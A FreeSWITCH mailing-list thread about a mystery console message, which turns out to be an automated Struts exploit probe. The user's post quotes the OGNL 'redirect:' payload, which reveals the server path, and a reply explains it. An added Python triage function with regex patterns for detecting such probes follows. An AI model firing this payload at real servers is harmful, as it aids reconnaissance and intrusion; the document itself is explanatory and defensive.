[Freeswitch-users] mystery console message

Olgierd Ziolko lists.fs-users at uce.pw
Fri Nov 20 18:34:04 MSK 2015


Looks like a [likely automatic] attempt to exploit a well-known Struts
vulnerability.
Nothing to worry about - you keep FreeSWITCH on a port well known for
presenting HTTP-related services, so you'll get more of it.

Just block all strings containing 'HTTP/1' and forget about that - the Internet
is full of bots and zombies.

Best regards,
O.

On 18 November 2015 at 17:02, Russell Treleaven <rtreleaven at bunnykick.ca>
wrote:

> I saw this on the freeswitch console months ago and did not get around to
> following up on it until now.
> A freeswitch profile is listening on :8080
>
> a.b.c.d = remote address
> w.x.y.z = freeswitch address
>
> What is this?
> Is it a concern?
>
> recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:
>    ------------------------------------------------------------------------
>    POST /login.action HTTP/1.1
>    User-Agent: Mozilla/5.0
>    Accept: */*
>    Content-Type: application/x-www-form-urlencoded
>    Host: w.x.y.z:8080
>
> Content-Length: 395
>    Expect: 100-continue
>    Connection: Keep-Alive
>
>
>  redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
>
>
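An added example, not part of the original thread or of FreeSWITCH's own code: a triage function that classifies a message received on a SIP listener and flags the Struts `redirect:` probe quoted above. The function name, the sample messages and the shortened payload are constructed for illustration; the addresses are the thread's own placeholders.

```python
import re
from urllib.parse import unquote

# Start lines: SIP is what the profile expects; HTTP is what the scanner sent.
SIP_START = re.compile(rb"^(?:[A-Z]+ \S+ SIP/2\.0|SIP/2\.0 \d{3} .*)$")
HTTP_START = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")
# Struts parameter prefix followed by an OGNL expression. "redirect:" is the
# prefix in the thread's sample; the other two are Struts' sibling prefixes
# and go beyond what the thread shows.
OGNL_PREFIX = re.compile(r"(?:redirect|redirectAction|action):[$%]\{")


def triage(raw: bytes) -> dict:
    """Classify one message received on a SIP listener (hypothetical helper)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    start_line = head.split(b"\r\n", 1)[0].strip()
    if SIP_START.match(start_line):
        return {"kind": "sip", "action": "process", "reasons": []}
    if not HTTP_START.match(start_line):
        return {"kind": "unknown", "action": "drop", "reasons": ["not SIP"]}
    reasons = ["HTTP request on a SIP port"]
    # Decode percent-encoding twice so double-encoded probes are also caught.
    text = unquote(unquote(body.decode("latin-1")))
    target = unquote(start_line.split(b" ")[1].decode("latin-1"))
    if OGNL_PREFIX.search(text) or OGNL_PREFIX.search(target):
        reasons.append("Struts OGNL parameter probe")
    if target.split("?", 1)[0].endswith(".action"):
        reasons.append("targets a Struts .action endpoint")
    return {"kind": "http", "action": "drop", "reasons": reasons}


# Constructed sample modelled on the console output in the thread; the body
# is shortened and harmless.
SAMPLE_PROBE = (
    b"POST /login.action HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Host: w.x.y.z:8080\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"redirect:${%23res%3d%23context.get('x')}"
)
# Constructed SIP request, for contrast.
SAMPLE_SIP = (
    b"OPTIONS sip:w.x.y.z:8080 SIP/2.0\r\n"
    b"Via: SIP/2.0/TCP a.b.c.d:4423\r\n"
    b"\r\n"
)
```

Every non-SIP message gets the `drop` action; the `reasons` list is for logging, so routine HTTP scanner noise can be told apart from framework-specific probes.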

